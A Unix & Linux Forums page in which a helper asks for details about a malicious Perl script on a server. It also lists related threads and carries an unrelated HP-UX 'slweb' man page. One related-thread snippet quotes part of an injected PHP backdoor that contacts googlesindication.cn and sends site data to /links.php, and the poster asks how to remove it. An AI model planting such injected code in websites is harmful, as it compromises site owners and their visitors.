Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Malicious perl script
Operating Systems Linux Debian Malicious perl script Post 302992300 by drysdalk on Thursday 23rd of February 2017 03:21:04 PM
Old 02-23-2017
Hi,

There are a few possible approaches here, but first a bit more info would be ideal. Is this Perl script somewhere in someone's Web space on a shared Web server running Apache, and somehow it's getting triggered and causing the shared Web server to start sending out spam ? Or is the situation something different ?

If you can give some idea of the typical role of this server, what exact OS and distribution it's running, what processes you'd expect to see running on it (i.e. does it ever run any Perl for legitimate reasons), and what your findings are so far, that would be a big help.
Last edited by drysdalk; 02-23-2017 at 04:32 PM..
 

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl... (1 Reply)
Discussion started by: grajp002
1 Replies

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies

LEARN ABOUT HPUX

slweb

slweb(1M)																 slweb(1M)

NAME

       slweb - start the HP-UX hardware event viewer tool (a Web interface)

SYNOPSIS

       Path:

DESCRIPTION

       The HP-UX hardware event viewer tool (slweb) can be used to display hardware events from log files or raw hexadecimal word pairs.

       The  command  starts the user interface.  Once started the help facility of is available and can be used to learn more about by clicking on
       field labels or column headings.

       The HP-UX hardware event viewer tool user interface uses a Web browser.	Executing the command without any options performs  the  following
       tasks:

	      o  create server certificates if needed

	      o  start the management Web server if it is not running

	      o  start a Web client (browser)

       An  attempt  will  be  made to connect to a Netscape Web browser running on the X server defined by the DISPLAY environment variable.  If a
       running Netscape client is found, it will be used, otherwise a new Netscape session will be initiated.  This will only happen if  the  Net-
       scape process is running the same system as that referenced by the DISPLAY variable, unless the option is used.

       If  is  executed without any options, the server will stop automatically after a period of inactivity.  If the server is started explicitly
       using it will run until the system is rebooted or the server is stopped with

   Options
       The recognizes the following options:

       Display events on a remote system (
		      hostname), using a client on the local system.  The Web server on the remote system must already be running.

       Forces a client browser to be used in less secure ways.
		      Two security features are overridden by the option.

		      The option forces the client browser to be used or started, even if the X-traffic between  the  X-server	and  the  Netscape
		      browser is not secure.

		      If  is  executed	by privileged user with the option, a temporary login bypass key will be generated.  The bypass key allows
		      the user to access the Web interface without having to provide login information again.

		      Only use this option if you are sure the network traffic between the host where Netscape is running, and	the  host  in  the
		      DISPLAY variable is secure.

       Forces the creation of new server certificates.
		      This  can  be  performed	if  the server's certificates expire, or if the security of the certificates has been compromised.
		      When new certificates are created, the command will also restart the slweb Web server.

		      The option is only available to the because it requires creation of an SSL certificate.

       The	      option is only available to the

		      stops the running slweb
				     Web server.

		      starts the slweb
				     Web server, if started this way, it will run until rebooted or until stopped with

		      displays the status of the slweb
				     Web server.

		      stops and then starts (
				     the slweb Web server.

   Security Certificates
       will generate an SSL certificate authority and use that to sign a generated SSL certificate.  Because this certificate is self signed, your
       web  browser  will  probably prompt you to see if you want to accept this certificate before it connects to the HP-UX hardware event viewer
       application.

       It is possible to accept these certificates each time, just for the session, or you can accept the certificates on a  permanent	basis  (10
       years), and not have to accept them again later.

       regenerates the certificates when they are not there, if the hostname is changed on the system, or when the option is used.

   Online Help
       Once the HP-UX hardware event viewer is started, the online help provides details on how to use the tool.

RETURN VALUES

       Upon completion, returns one of the following values:

       Successful.

       An error occurred.

WARNINGS

       Accepting a certificate saves an identifier for the certificate in a file where the browser is running.	If you reinstall the gui, the cer-
       tificate will be altered, and some browsers report the change in id as a potential security violation.

       When this happens, you have to instruct your browser to delete the saved certificate.  On Netscape 4.7x this is done by selecting the  menu
       pick.  On the resulting dialog box, select the " area and delete any certificates for machine associated with the security violation.

AUTHORS

       slweb was developed by Hewlett-Packard

REFERENCES

       See the "privileges" man page for more information on the

																	 slweb(1M)
All times are GMT -4. The time now is 11:53 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy